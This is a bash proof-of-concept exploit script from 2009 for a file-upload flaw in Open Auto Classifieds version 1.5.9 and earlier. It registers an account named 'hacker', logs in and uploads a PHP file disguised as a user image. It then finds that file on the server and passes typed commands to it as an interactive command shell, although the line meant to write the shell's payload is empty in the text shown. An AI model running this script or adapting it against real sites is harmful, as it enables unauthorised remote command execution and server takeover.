#!/bin/bash # File Upload exploit for Open Auto Classifieds version <= 1.5.9 # # Researched by Andrew Horton (urbanadventurer) # (c) MorningStar Security, 2009 http://www.morningstarsecurity.com/ if [ -z "$1" ]; then echo "Usage: $0 " echo "File upload proof of concept exploit for Open Auto Classifieds <= v 1.5.9" echo "This will create a user with the name 'hacker' and pass '31337' then upload a command execution shell." echo -e "eg. $0 http://www.myweb.com/cardealer/\n" exit fi target="$1" echo "" > evilimage.jpg.php echo "Registering user" curl -c cookiejar -d "user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree" "$target/register.php" >/dev/null 2>&1 echo "Login" curl -b cookiejar -c cookiejar -d "user=hacker&pass=31337&submit=Login" "$target/login.php" >/dev/null 2>&1 echo "Upload command shell as user image" curl -b cookiejar -c cookiejar -F "image=@evilimage.jpg.php" -F "max=524288" -F "addimage=Submit" "$target/useredit.php" >/dev/null 2>&1 CODE=`curl -b cookiejar -c cookiejar "$target/member.php" 2>/dev/null | grep _thumb.jpg | egrep -o "[0-9]{4}"` rm -f cookiejar evilimage.jpg.php echo "Command shell found at : $target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id" curl "$target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id" 2>/dev/null while read cmd; do curl -d "cmd=$cmd" "$target/images/users/hacker${CODE}evilimage.jpg.php" 2>/dev/null done